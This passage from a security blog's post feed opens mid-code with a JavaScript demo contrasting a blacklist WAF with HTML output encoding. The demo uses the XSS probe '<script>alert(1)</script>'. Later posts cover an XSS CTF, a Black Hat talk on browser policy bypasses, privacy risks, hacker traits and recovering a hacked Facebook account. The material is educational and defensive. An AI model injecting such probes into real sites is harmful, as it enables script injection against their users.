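    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
  };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// The safe way to render a user comment: encode at the output boundary.
function renderComment(comment) {
  return '<p class="comment">' + encodeForHtml(comment) + "</p>";
}

// Constructed samples: a benign sentence that the rule list wrongly rejects
// (a false positive), and the classic probe that encoding neutralizes.
const benign = "Run onload=init in your setup script, it works fine";
const probe = "<script>alert(1)</script>";

function wafVerdicts() {
  return { benign: blacklistWaf(benign), probe: blacklistWaf(probe) };
}

console.log(wafVerdicts());          // both "blocked": the benign one is a false positive
console.log(renderComment(probe));   // rendered as inert text, no rule needed
```

The rule list blocks the benign sentence because of the substring <code>onload=</code>, which is exactly the false-positive trade-off described in the abstract; the encoded rendering needs no such guess and stays correct for input the rule authors never anticipated.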
<br />
<b><u>Prerequisite</u></b><br />
<br />
- Basic knowledge about HTML/JavaScript<br />
<br />
- Basic know how about XSS attacks<br />
<div>
<br /></div>
<b><u>Webcast </u></b><br />
<b><u><br /></u></b>
<b><u><br /></u></b>
<iframe allowfullscreen="" frameborder="0" height="360" src="https://www.youtube.com/embed/dWLpw-7_pa8" width="577"></iframe>
<b><u> </u></b><br />
<b><u><br /></u></b>
<b><u>CTF Competition</u></b><br />
<b><u><br /></u></b>
After the webinar, we had this "CTF" challenge made up by a friend of mine, "<b>FileDescriptor</b>". Certain parts of the first two challenges are based upon characteristics of a real-world WAF that I encountered in the wild, combined with FD's ideas to make up the challenge. The last challenge is based upon "<b>@FileDescriptor</b>"'s unique idea and hence it's not easy to crack, so we named it "<b>Hard</b>".<br />
<br />
<b>CTF Link :<a href="http://92.222.71.224/" rel="nofollow" target="_blank">http://92.222.71.224</a></b>
</div>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com2tag:blogger.com,1999:blog-3121270199089759062.post-76523278766925731312016-04-21T11:02:00.001-07:002020-05-27T14:29:35.991-07:00Bypassing Browser Security Policies for Fun and Profit (Full Presentation Video)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYHFnwt3haDbTJGnIO3ri04bttelrblMyS-nh5qu8lly8K_PGzredpUEUM2T-Pymci0H1oFMiZu_t2Sk_0zakrp4lWEQYenbWcicCfpPcWzFSqSk_EaIh_2jkgmrwURGbHWo6F06pd9M/s1600/black-hat-asia-2016.jpg" imageanchor="1" style="background-color: white; color: #666666; font-family: Verdana; font-size: 12px; line-height: 19.2px; margin-left: 1em; margin-right: 1em; text-align: center; text-decoration: none;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYHFnwt3haDbTJGnIO3ri04bttelrblMyS-nh5qu8lly8K_PGzredpUEUM2T-Pymci0H1oFMiZu_t2Sk_0zakrp4lWEQYenbWcicCfpPcWzFSqSk_EaIh_2jkgmrwURGbHWo6F06pd9M/s320/black-hat-asia-2016.jpg" style="border-width: 0px; padding: 10px;" width="320" /></a></div>
Blackhat has just released the full video of my talk on the subject of "<b><a href="http://bypassing%20browser%20security%20policies%20for%20fun%20and%20profit%20%28blackhat%20asia%202016%29/" rel="nofollow" target="_blank">Browser Security</a></b>". If you wish to read the whitepaper/slides and the SOP test suite, you can refer to my previous post on "<b><a href="http://bypassing%20browser%20security%20policies%20for%20fun%20and%20profit%20%28blackhat%20asia%202016%29/" rel="nofollow" target="_blank">Bypassing Browser Security Policies For Fun And Profit</a></b>"<br />
<b></b><br />
<a name='more'></a><br />
<b>Abstract</b><br />
<b><br /></b>
<i>Mobile browsers in comparison to desktop browsers are relatively new and have not undergone the same level of scrutiny. Browser vendors have introduced and implemented tons of protection mechanisms against memory corruption exploits, which makes it very difficult to write a reliable exploit that would work under all circumstances. This leaves us with the "other" category of Client Side attacks. In this presentation, we will present our research about bypassing core security policies implemented inside browsers such as the "Same Origin Policy," and "Content Security Policy," etc. </i><br />
<i><br /></i>
<i>We will present several bypasses that were found in various mobile browsers during our research. In addition, we will also uncover other interesting security flaws found during our research such as Address Bar Spoofing, Content Spoofing, Cross Origin CSS Attacks, Charset Inheritance, CSP Bypass, Mixed Content Bypass, etc., as found in Android Browsers. We will also talk about the testing methodology that we used to uncover several android zero days. Apart from the theory, our presentation will also disclose a dozen of the most interesting examples of security vulnerabilities and weaknesses highlighted above, which we identified in the most popular Android third-party web browsers, and in Android WebView itself.</i><br />
<i><br /></i>
<i> We will explain the root cause of the bug and demonstrate their exploitation, show examples of vulnerable code and, where possible, patches that were issued to address these vulnerabilities. Finally, we will demonstrate a sample test suite which can be used to assess basic security properties of any mobile web/browser.</i><br />
<br /></div>
<iframe allowfullscreen="" frameborder="0" height="480" src="https://www.youtube.com/embed/P5R4KeCzO-Q" width="854"></iframe></div>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com2tag:blogger.com,1999:blog-3121270199089759062.post-26695567300708320892016-04-13T07:07:00.000-07:002020-05-27T14:30:02.102-07:00How Much Do Hackers Know About You?<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpJcXnmdukM9SAr61GQB9lS24HZDOUQYveArvRTm42hS6kzrtk-__2dmfCwsVvl1KwTO4_f2IIXMG0ayzd2na_VfLRLsou73aiq7b0iU6TeBO0atzZ66EmkqNnbsF-LdNzDkeQHcN9JSs/s1600/Hacker-silhouette.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpJcXnmdukM9SAr61GQB9lS24HZDOUQYveArvRTm42hS6kzrtk-__2dmfCwsVvl1KwTO4_f2IIXMG0ayzd2na_VfLRLsou73aiq7b0iU6TeBO0atzZ66EmkqNnbsF-LdNzDkeQHcN9JSs/s400/Hacker-silhouette.jpg" width="400" /></a></div>
<br />
The threat of black hat hackers has never been greater than now, considering the increasing organization of their efforts to make a dollar off of your digital assets and information. The common portrayal of the hacker is someone who knows enough about programming and the internet that they can seemingly access any information or know anything about anyone.<br />
<br />
This is mostly an exaggeration. Finding information on someone is still work, sometimes very time-consuming and usually not worth the effort from a financial standpoint unless done on a large scale. It does beg the question, however, of how much hackers might know about you. Based on the trails you leave online and who you trust your information with, a hacker might already have a file with your name on it. It is a question worth investigating.<br />
<br />
<a name='more'></a><br />
The answer is different for every person. <b><u>Here are some factors you need to take into consideration:</u></b><br />
<h4 style="text-align: left;">
Public Network Usage</h4>
How often do you use dangerous public networks to conduct online transactions or communicate with others? If you use them at all without protection, you leave yourself open to data interception. Hackers will often hang out in cafes or other public places with WiFi and use a “sniffing” device to take in the traffic of anyone unfortunate enough to be sending and receiving data over the network. Think back to what you’ve sent over a public network. Anything you sent or received could very well be in the hands of a hacker.<br />
<br />
The best way to protect yourself on a public network (other than not using it) is to equip your device with a strong Virtual Private Network (VPN). A VPN will connect your device to an offsite secure server via an encrypted connection, allowing you to keep your information a secret from anyone hoping to look on. As an added benefit, your IP address will be masked by that of the offsite server, so you will be able to avoid tracking in that manner as well.<br />
<h4 style="text-align: left;">
Large Scale Data Breaches</h4>
Do you know if your information has been leaked in a large scale data breach such as the Office of Personnel Management attack or the Target credit card scandal? If so, you might not have been immediately targeted for an attack, but it doesn’t mean that the information has vanished from the internet. For the right price, that data (or large sets of data containing your information at a wholesale price) could be sent to an interested party. Some might not apply anymore, but with the right information, you could be traced.<br />
<br />
To prevent this sort of thing in the future, the most you can do is choose the right organizations to trust your information to. Try to lobby for stronger standards of cybersecurity with the businesses you use and the government. You can’t control organizations, but you can control who you trust.<br />
<h4 style="text-align: left;">
Has One Account Been Compromised?</h4>
Much like dominoes, the breach of even one of your accounts can lead to a loss of other accounts linked to it or sharing data. Try to imagine what would happen if someone else had access to your email account. They would likely need only an hour to completely ruin your online life, should they want to. One social media account breach could easily lead a hacker to copy all of your conversations and scan them for private information. They might not even read it until the time is right to scam or blackmail you.<br />
<br />
Think back and ask yourself if even the most minor of your accounts has been compromised. If so, ask yourself how long ago the incident took place. Look more into the data you could have lost at that time and whether it still is relevant today (some will be). Remember that in addition to financial information, the names of friends and family members could be linked with your accounts.<br />
<h4 style="text-align: left;">
What Do You Keep on Your Computer?</h4>
Much of what black hat hackers do involves malware and using it to gain information on you. While some malware acts more like ransomware or a portal to let other malware in, other malware (or the same malware as a secondary measure) collects whatever information it can from you and sends the data on to its creator or owner.<br />
<br />
If you’ve ever been the victim of malware, a lot of what you keep on your computer could be known by a hacker. Make sure that you try to avoid shady websites and use the best tools you can such as a high quality security suite to keep malicious programs off of your precious devices.<br />
<h4 style="text-align: left;">
Privacy and Social Media Presence</h4>
Even if you keep your social media accounts safe, a hacker could use them to find out important information about you. Privacy is important to fend off malevolent hackers in a world of sharing.<br />
<b><br /></b>
<b>Consider the following:</b><br />
<br />
<ul style="text-align: left;">
<li>If you tag your location in a public post often enough, they might be able to get a general idea of your routine.</li>
<li>If you don’t make your accounts as private as possible, a clever hacker might be able to use your public communications with your friends against you and deduce some of your movements and activities.</li>
<li>Even things such as the time of day you post can say a lot about you. A skilled hacker can use even the most basic information such as this to help build a plan to scam you better.</li>
<li>Doing a quick Google search of yourself online is a great way to determine how private you are online. If you can find it out through Google, have no doubt a hacker can find out the same information.</li>
</ul>
<br />
This is clearly a difficult question to answer for certain, but hopefully by this point you have a better idea of what to look out for and what a hacker could know about your personal life and what information they could have. You aren’t defenseless, but further vigilance regarding all of your online activities is required.<br />
<br />
Do you think there are any other factors to consider when trying to figure out how much a hacker could potentially know about you? Are there any other tools and methods of protections you would recommend? Please leave a comment below with your thoughts on the matter to continue this conversation.<br />
<div>
<h4>
About The Author</h4>
Cassie is a cyber security enthusiast who writes for "<a href="https://securethoughts.com/express-vpn-review/" rel="nofollow" target="_blank"><b>SecureThoughts</b></a>" who understands that hackers will do anything they can to get information on anyone they can. The more you know, the better you can protect yourself, and ultimately that is her goal, to help others learn how to best protect themselves. </div>
</div>
Farhan Azamhttp://www.blogger.com/profile/07946638849267227635noreply@blogger.com0tag:blogger.com,1999:blog-3121270199089759062.post-10590580676022333082016-03-31T04:49:00.001-07:002020-05-27T14:30:17.835-07:00Bypassing Browser Security Policies For Fun And Profit (Blackhat Asia 2016)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYHFnwt3haDbTJGnIO3ri04bttelrblMyS-nh5qu8lly8K_PGzredpUEUM2T-Pymci0H1oFMiZu_t2Sk_0zakrp4lWEQYenbWcicCfpPcWzFSqSk_EaIh_2jkgmrwURGbHWo6F06pd9M/s1600/black-hat-asia-2016.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhYHFnwt3haDbTJGnIO3ri04bttelrblMyS-nh5qu8lly8K_PGzredpUEUM2T-Pymci0H1oFMiZu_t2Sk_0zakrp4lWEQYenbWcicCfpPcWzFSqSk_EaIh_2jkgmrwURGbHWo6F06pd9M/s320/black-hat-asia-2016.jpg" width="320" /></a></div>
<br />
A few hours back, I delivered a talk at Blackhat Asia 2016 on <b>"Bypassing Browser Security Policies For Fun And Profit</b>"; the talk covered a wide variety of topics, starting from SOP bypasses, CSP bypasses and so on. Due to limited time I was only able to cover a few topics; however, you can find the rest of the topics in the WhitePaper below. The following was the abstract:<br />
<a name='more'></a><b><br /></b>
<br />
<h4>
Abstract</h4>
<br />
'<i>Mobile browsers, in comparison to desktop browsers, are relatively new and have not undergone the same level of scrutiny. Browser vendors have introduced and implemented tons of protection mechanisms against memory corruption exploits, which makes it very difficult to write a reliable exploit that would work under all circumstances. This leaves us with the "other" category of client-side attacks. In this presentation, we will present our research about bypassing core security policies implemented inside browsers such as the "Same Origin Policy," and "Content Security Policy," etc. </i><br />
<i><br /></i>
<i>We will present several bypasses that were found in various mobile browsers during our research. In addition, we will also uncover other interesting security flaws found during our research, such as Address Bar Spoofing, Content Spoofing, Cross Origin CSS Attacks, Charset Inheritance, CSP Bypass, Mixed Content Bypass, etc., as found in Android browsers. We will also talk about the testing methodology that we used to uncover several Android zero days.</i><br />
<i><br /></i>
<i>Apart from the theory, our presentation will also disclose a dozen of the most interesting examples of the security vulnerabilities and weaknesses highlighted above, which we identified in the most popular Android third-party web browsers and in Android WebView itself. </i><br />
<i><br /></i>
<i>We will explain the root cause of each bug and demonstrate its exploitation, show examples of vulnerable code and, where possible, patches that were issued to address these vulnerabilities. Finally, we will demonstrate a sample test suite which can be used to assess basic security properties of any mobile web browser</i>'<br />
<br />
<b></b><br />
<h4>
<b>WhitePaper</b></h4>
<div>
<b><br /></b></div>
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUz-qj4HTDvkpJCqlU7NuSPcAvNCU8TeeiF1HcwGlN11DmlSLwQpuKTd9eVqtGQ0aHfCzRTrC4aJPgMpMr8qasj1Mz4BDHJJu4xkvJR4YQoNda6kuY66D6CHdCWHqGX_YxPS-64Q0p4OQ/s1600/1058332_996319127089148_582866012_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUz-qj4HTDvkpJCqlU7NuSPcAvNCU8TeeiF1HcwGlN11DmlSLwQpuKTd9eVqtGQ0aHfCzRTrC4aJPgMpMr8qasj1Mz4BDHJJu4xkvJR4YQoNda6kuY66D6CHdCWHqGX_YxPS-64Q0p4OQ/s400/1058332_996319127089148_582866012_n.jpg" width="386" /></a></div>
<div style="text-align: center;">
<br /></div>
<br />
<b>To download the Whitepaper, please click <a href="https://www.blackhat.com/docs/asia-16/materials/asia-16-Baloch-Bypassing-Browser-Security-Policies-For-Fun-And-Profit-wp.pdf" rel="nofollow" target="_blank">here</a>.</b><br />
<br />
<h4>
Slides</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzUK-Tk-0rJCVjhfClAcDoVeGHCZtfro-H0onk5g3OP_yKbIlTDrl3-mLHXdhq1ZXJsLR8e1TG8KecurJR_pNyZD3okbqvFmgZkjOal77TPAXVlOnMFjx53Tcs9y8KsjRo6cK_BVFOdms/s1600/test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzUK-Tk-0rJCVjhfClAcDoVeGHCZtfro-H0onk5g3OP_yKbIlTDrl3-mLHXdhq1ZXJsLR8e1TG8KecurJR_pNyZD3okbqvFmgZkjOal77TPAXVlOnMFjx53Tcs9y8KsjRo6cK_BVFOdms/s640/test.png" width="577" /></a></div>
<div>
<br /></div>
</div>
<b>To download the Slides, please click <a href="https://www.blackhat.com/docs/asia-16/materials/asia-16-Baloch-Bypassing-Browser-Security-Policies-For-Fun-And-Profit.pdf" rel="nofollow" target="_blank">here</a>.</b><br />
<br />
<h4>
SOP Bypass Mini Test Suite v 1.0 Beta</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlt-95SpfhwR6kTIlYCdsk-3GAeL7YkkC66eMDASHp2ATmSDG_mgyPoUfl3dSuuqI8vvHYlOaKAoCLqAX8BsKq9oHvDKJSC90qYp53SF0peXK9S3EVs3SVkOvVd0Ga8DKcQUKfawonygM/s1600/test.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlt-95SpfhwR6kTIlYCdsk-3GAeL7YkkC66eMDASHp2ATmSDG_mgyPoUfl3dSuuqI8vvHYlOaKAoCLqAX8BsKq9oHvDKJSC90qYp53SF0peXK9S3EVs3SVkOvVd0Ga8DKcQUKfawonygM/s640/test.png" width="577" /></a></div>
<br />
As promised in my talk, I am making the test suite available on my blog. This test suite contains over 40 different test cases that have proven useful in my research for testing Same Origin Policy bypass issues with different mobile browsers. Due credit was given to the researchers whose proofs of concept have been incorporated in this test suite. Please note that this is just the beta version; the next version will have more test cases, and we will try to automate the execution and results of all the test cases.<br />
<br />
<b>To download the SOP Bypass Mini Test Suite, please click <a href="https://github.com/rafaybaloch/SOP-Bypass-Mini-Test-Suite" rel="nofollow" target="_blank">here</a>.</b><br />
<br />
Should you have any questions, feel free to ask. </div>
Rafayhttp://www.blogger.com/profile/15944091083959815608noreply@blogger.com6tag:blogger.com,1999:blog-3121270199089759062.post-17501201089364637922016-02-09T13:03:00.000-08:002020-05-27T14:30:35.550-07:007 Qualities of Highly Effective Hackers<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMEtucXqVr6izUDX6ffS7WulxSY3YydnXajzWN8-keVY5JQfLim7lJeRsWgN3c1XuunT49Fn2oij7sEncgtHT7HlVVS4z3DFdQ9tCOA1z0Uh5ZGdeAEnCBzMUD44Yzu0boFLrL7KQ9KIA/s1600/frederic-pretty-hacker-hoax.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMEtucXqVr6izUDX6ffS7WulxSY3YydnXajzWN8-keVY5JQfLim7lJeRsWgN3c1XuunT49Fn2oij7sEncgtHT7HlVVS4z3DFdQ9tCOA1z0Uh5ZGdeAEnCBzMUD44Yzu0boFLrL7KQ9KIA/s320/frederic-pretty-hacker-hoax.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: left;">
When asked to write on this topic, I admit that it made me cringe just a bit, because I don't consider myself to be a highly effective hacker. I find myself a noob everywhere that I'm trying to learn new things, or I am frustrated with the most ridiculous "<b>hacker</b>" material on the web, written by school-taught programmers that follow step-by-step instructions out of a manual that everyone has already read. Then I thought to myself: "That's it!" That is Number One!<br />
<br />
<a name='more'></a></div>
<h4 style="text-align: left;">
Quality One - Always A N00b</h4>
<div>
<br /></div>
Yea. You heard it, and it sounds crazy, but do you ever wonder why on the forums and in comments you always see the trolls calling the weakest link a noob and picking on them, and then THEY are revealed to be newbies also? Well, guess what? I am ALWAYS in over my head, trying to learn things that are too much for me. When I go through phases where I only visit sites and forums where I am already adept at the subject or skill level at hand, I find that not only have months gone by without me learning anything new, but I have also gotten rusty at things I was beginning to learn.<br />
<br />
So, as crazy as it sounds, I believe that a highly effective hacker is always in places where he is a noob: always learning things he had no idea of and constantly finding things that overwhelm his mind, until a week later when he is teaching others how to do it and is busy with something else he doesn't yet understand. This is the way of intellectual progress. When you see guys on these forums and blog comments picking on newbies and boasting the same skills with nothing new, know that they are at their peak. Their time has come and gone, because they have settled for what they know and are satisfied with it in an ever-evolving and changing world of technology.
<br />
<h4 style="text-align: left;">
Quality Two - Curiosity</h4>
Do you think for a moment that the l33t ones out there, finding new exploits and breaking into systems, are just following step-by-step guides or motivated by their job or a pay check? If so, I am sorry to rain on your parade, but an effective hacker has an obsessive curiosity.<br />
<br />
These personal drives will bring a person farther in skill than the need for a promotion or recognition will. "I wonder what would happen if I tried to..." "What do you suppose they keep in here..." "OMG! What if I trick it into running this as a..." These are the basic thought patterns of an effective hacker. Not just when he has a job to do; I mean always. For example, when you were a kid (or even now) you played a video game and found a weird glitch (not necessarily a 'cheat') that you thought was funny. "Oh wow. If I walk into this corner backward he kinda gets stuck there... UPSIDE DOWN! LOL", "What would happen if I do that and try to jump at the same time? Oh weird! It drops my character where I'm not even supposed to be yet!" OK, this is the curiosity that intrigues an effective hacker. He wants to make things work in ways they were not originally intended to.
<br />
<h4 style="text-align: left;">
Quality Three - Enjoys being places he doesn't belong</h4>
Hey, sorry all you white-hats out there, but it's true. I won't condone trespassing, but many of the most effective hackers get serious pleasure out of being places they do not belong. I once read that everything that drives a man is a form of penetration, of inserting what he feels is himself into something he feels is not himself. I don't know about all that, but some of these guys get pleasure in the same way that a voyeur enjoys watching what he is not allowed to. They enjoy getting into places they are not supposed to be. Now, I am not encouraging this behaviour, just laying out the facts. The reason these people find ways to get into things is because these fundamental, basic drives compel them to. It closes the gap of all the things he must learn in order to achieve what he wants.
<br />
<h4 style="text-align: left;">
Quality Four - An unbalanced lifestyle</h4>
I often find myself engrossed in a project (not just computer related) and nothing else exists. If you ever see these skinny or fat guys beating at their computer at 3 in the morning with empty coke cans and full ashtrays all around until they finally call it a day... and then it's time to go back in to work. That's them. LOL. Now, I am not saying that being an effective hacker means they do not have a life (though some may not). A lot of very successful people get obsessed with what they are working on and do nothing but that... for a while. Then they go through a phase where they are obsessed with something different.
<br />
<h4 style="text-align: left;">
Quality Five - Likes to break things</h4>
Come on guys! We're hackers! We love to smash things apart and see what happens. Because, face it, it's much easier to break something than to make it, and it rewards a valuable opportunity to put it back together in a different way.
<br />
<h4 style="text-align: left;">
Quality Six - Well Organized</h4>
In the beginning, it's OK to have files, folders, projects, and programs littered amongst temporary directories, hard drives and OSes. But eventually that's going to be a huge problem. The most efficient hackers have definitely learned to become very well organized multitaskers. You'll see various windows and terminals open, separate directories for everything, well categorized, and a task manager changing process priorities as he's bouncing from one project to the other across his screen.
<br />
<h4 style="text-align: left;">
Quality Seven - Everything is Insecure until... Never.</h4>
The most efficient hackers know that all software, hardware, and access controls are man-made and riddled with flaws, predictabilities, and unpredictabilities, a reflection of their creators: people. Nothing can ever be completely trusted, just as no person can be completely trusted.
<br />
<br /></div>
<h4>
About the Author</h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVyNCrN6xmwchH6yLOWle0ROMnS3bh-ujCwsZSEN7ZqtsVgnsR2Css0FJYyuoKkNu-nHlZW9FFGzlaRbLvBb0U0sJ2faEzf9ewbmju93Mn6w6c-TQ6iOKB30HElJgxmOTqvPrJCN4FX3k/s1600/954433_240088456157351_1866033370_n.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVyNCrN6xmwchH6yLOWle0ROMnS3bh-ujCwsZSEN7ZqtsVgnsR2Css0FJYyuoKkNu-nHlZW9FFGzlaRbLvBb0U0sJ2faEzf9ewbmju93Mn6w6c-TQ6iOKB30HElJgxmOTqvPrJCN4FX3k/s320/954433_240088456157351_1866033370_n.jpg" width="226" /></a></div>
I'm Gary. Though I have many names in many places, this is my true one. I am honored to have been invited by the <b>RHA</b> InfoSec to create content. I can't really go all the way into my experience; suffice it to say my greatest teachers have been hours upon hours of trial, effort, information and second opinions.<br />
<br />
My skill-set is wide and varied and I am more a "Jack of all trades" than a specialist in any one category. I stay pretty busy with various projects (not all computer related), but I will do my best to lend my time, effort, and knowledge. If I am busy or unable to answer any of your inquiries or handle your requests, for whatever reason, then I am sure Rafay, or Preston, or any of the others can when they are able.
Last but not least: I (PERSONALLY) do not want your likes, recognition, attention, traffic, or friends. Please save all of that for Rafay and the <a href="http://facebook.com/rafayhackingarticles" rel="nofollow" target="_blank">RHA Page</a>. These guys have put this together for you and deserve all recognition for it. Thank you.
</div>
Farhan Azamhttp://www.blogger.com/profile/07946638849267227635noreply@blogger.com10tag:blogger.com,1999:blog-3121270199089759062.post-47789757175613446952016-01-17T08:51:00.002-08:002020-05-27T14:31:02.869-07:00Facebook Account Hacked! What To Do Now?<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4sl1fhJ9DUYy65KeE3I1nA8awQStQXH4p8e-DkLivVOQ4GUJxPoHLOZuWUVS1V9kx6aZ-59KNZP501Vz7aa_kn7udvMFnbqGUFUt5kJidIgunLM3G_JW48gbxvNlkYB1BxCEA3fsRT8/s1600/images.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha4sl1fhJ9DUYy65KeE3I1nA8awQStQXH4p8e-DkLivVOQ4GUJxPoHLOZuWUVS1V9kx6aZ-59KNZP501Vz7aa_kn7udvMFnbqGUFUt5kJidIgunLM3G_JW48gbxvNlkYB1BxCEA3fsRT8/s1600/images.jpg" /></a></div>
<br />
Every single day I get emails in my inbox and on my <a href="https://www.facebook.com/rafaybalochofficialpage/?fref=ts" rel="nofollow" target="_blank">Facebook page</a> from users asking how to recover a<a href="http://www.rafayhackingarticles.net/2010/01/4-ways-on-how-to-hack-facebook-password.html" target="_blank"> hacked Facebook account</a>, and a common problem I see in all of them is that they are proactive. Everyone searches for Facebook account recovery software, <a href="http://www.rafayhackingarticles.net/2010/01/4-ways-on-how-to-hack-facebook-password.html" target="_blank">Facebook hacking software</a> and recovery mechanisms after their Facebook or any other email account has been hacked. In this article, Gary suggests methods to identify whether your computer or email account has been hacked, and what you can do after your Facebook account has been hacked.<br />
<br />
In today’s digital world, it is unfortunately not uncommon for an account or machine to be compromised by an attacker for nefarious purposes. During your searches for a step-by-step solution, your frustration may hit the breaking point as you scroll through page after page listing preventative measures that it may already be too late for. No problem. In today’s article I will outline simple strategies that should get you back in control of your online accounts and devices after a breach is suspected or confirmed. These instructions will be laid out in a manner that should be quite easy for an average user to comprehend and execute. But first, let’s take a minute to understand exactly how this probably happened in the first place.<br />
<br />
<a name='more'></a><b>NOTE: If you are potentially dealing with this situation right now, please skip ahead to the “What Do I Do?” section of this article first. Then be sure to read the rest.</b><br />
<h4 style="text-align: left;">
Did I Get Hacked?</h4>
You’re browsing around online and suddenly your friends on social media are asking you what these links you keep sending them are, or perhaps the password to an online account has been changed, emails are being sent from your email account, or there is just something strange in your activity log. Do any of these mean that your account has been compromised?<br />
<br />
First of all, when in doubt, always assume your account and system have been compromised and take the appropriate measures to secure them. Do not let an attacker maintain a foothold and continue masquerading as you and/or stealing your sensitive data and files while you come up with excuses to justify unfamiliar activity. Also, while many online services and accounts have a ‘<b>connected devices</b>’, ‘<b>location information</b>’, or ‘<b>login activity</b>’ viewer in their settings, this should never be relied on as a sure-fire way to rule out being hacked. There are many ways that these features can be rendered useless: malware installed on the user’s machine can set up an HTTP or SOCKS proxy through which the attacker’s traffic appears to originate from that machine, session cookies can be stolen, and even the online account settings themselves can be manipulated, or be flawed, so as to cover malicious activity. Secure your accounts and system anyway, just to be safe. It may be time consuming, but it is far better than waiting around for something bad to happen.<br />
<br />
<h4 style="text-align: left;">
How Does This Happen (Methods To Hack Facebook Account)?</h4>
There are many methods which attackers deploy to breach their victims' online accounts. This is not meant to be an instruction manual or even a comprehensive list of every way an attacker can possibly compromise your system, accounts, and/or online services; it is just an overview of the most common real-world techniques that are actually being deployed. If you’ve been hacked, chances are good that it was done by a combination of the techniques listed below. <br />
<br />
There are <b>Man-In-The-Middle Attacks</b>, which capture data packets from the victim machine and store them before sending them along to the proper destination. There’s <b>Phishing</b>, where an attacker convinces you to sign in to your account via a fake login page, then steals your credentials. Sometimes websites themselves are hacked via SQL injection, dumping the entire database of usernames and password hashes; these same username/password combinations are then attempted on many other sites, since a lot of users reuse the same login credentials across many websites and services. Then there is potentially the most dangerous: malware can be installed on the victim machine which can do anything from logging keystrokes, to remotely browsing the filesystem, to opening a remote shell, or even spying on the users via their webcams and microphones. <br />
<br />
The malicious hacker’s toolbox of techniques is always evolving and changing to meet changes in security practice, and while there are other ways accounts can be compromised, most real-world hacks are a combination of some of the techniques listed above. <br />
<br />
<h4 style="text-align: left;">
“What Do I Do?”</h4>
I would like to divide this into three sections, as each is important: Secure Your Accounts and Services, Secure Your Machines and Devices, and Damage Control. You don’t know for sure how much of a foothold an attacker has, or how long they have had it before you realized or became suspicious. So assume everything has been compromised and secure each of them, as any one may be used by an attacker to later re-compromise what you have secured.<br />
<div>
<h4 style="text-align: left;">
Secure Your Facebook Accounts and Online Services</h4>
You must change the passwords of all the online accounts and services that you use, even the ones that you don’t recall using sensitive data on. This should obviously be prioritized, beginning with the account that you noticed suspicious activity on.<br />
<br />
Then quickly change the passwords of your associated email accounts, as these can usually be used to reset the passwords of your other accounts. Be sure to ‘<b>logout active sessions</b>’ or disconnect connected devices, if your service has this feature. If so, you will probably be prompted with it during the password reset process.<br />
<br />
Do not use the same passwords across different sites or services. Go to the security settings of each site or service and activate every notification you possibly can for login attempts and activity. Enable two-factor authentication. Make it a pain in the ass to log in if you must. Remember that ease of use and convenience are simply open doors for many others. <br />
<br />
Then, after you have secured your devices, go through and do a final sweep of password changes. This final step is due to the fact that, if malware is installed on your device, an attacker could potentially be watching you change all your passwords the first time.<br />
<br />
Also, follow your website, social media, or other online service’s specific guidelines for reporting unusual behavior and securing your accounts. They most likely have a staff that deals with these situations on a daily basis, are usually very polite and helpful, and there should never be any negative consequences if you are in error in your reporting of a hacked account.<br />
<h4 style="text-align: left;">
Secure Your Devices</h4>
